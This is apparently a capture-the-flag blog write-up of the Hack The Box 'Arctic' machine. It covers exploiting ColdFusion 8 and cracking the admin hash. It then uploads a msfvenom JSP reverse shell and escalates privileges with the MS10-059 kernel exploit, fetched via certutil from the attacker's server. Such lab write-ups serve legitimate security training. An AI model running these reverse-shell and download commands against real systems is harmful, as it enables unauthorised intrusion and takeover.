- Published on
Hack The Box - Arctic
We are going to pwn Arctic from Hack The Box.
Link : https://www.hackthebox.eu/home/machines/profile/9
Lets Begin with our Initial Nmap Scan.
Nmap Scan Results:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Nmap scan doesn't show whats in port 8500
so I started checking that, Which reveals a directory.
/cfdocs/
br/ Some docs files, nothing useful.br/
/CFIDE/
br/
Found an administrator
over there and it leads to an login page. Which is ColdFusion8
by Adobe.
Since we know the version we can start looking for exploits and I found this.
I tried that payload in the url and it gave me a hash, It will be the admin's hash.
I used CrackStation to do this.
Logged in as admin happyday
Now its time to get reverse shell, Under Debugging & Logging
Category I found Scheduled Tasks
.br/
It gives us an ability to download an file and store it in the box -
Publish
but we need to give the directory.
Since ColdFusion running as Java
we need to create a reverse shell using jsp
.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=1234 -f raw > shell.jsp
We need to upload it so, I started Python HTTP server.
Now where to store the script? I found the location of ColdFusion
in Server Settings > Mappings
Now its time to upload the shell!!
Once uploaded I visited http://10.10.10.11:8500/CFIDE/
is where the reverse shell
is stored.
Started my listener and opened shell.jsp
br/
Got User Shell and Flag!
Privilege Escalation:
Like always when I get a shell I start with systeminfo
br/
Where Hotfix(s): N/A which means the system is not updated so far.
A hotfix or quick-fix engineering update is a single, cumulative package that includes information that is used to address a problem in a software product.
So we can try with Windows-Exploit-Suggester
I Copied the systeminfo
output to my machine as systeminfo.txt
and start WIndows_Exploit_Suggester. Since there is a lot of vulnerability, I started with
MS10-059
.Searched for exploits and found this Windows_kernel_exploit This is the one we need.
https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri
Uploaded the executable to the box
certutil.exe -urlcache -split -f http://10.10.14.31:8000/Chimichurri.exe Chimichurri.exe
Started my Listener and got AUTHORITY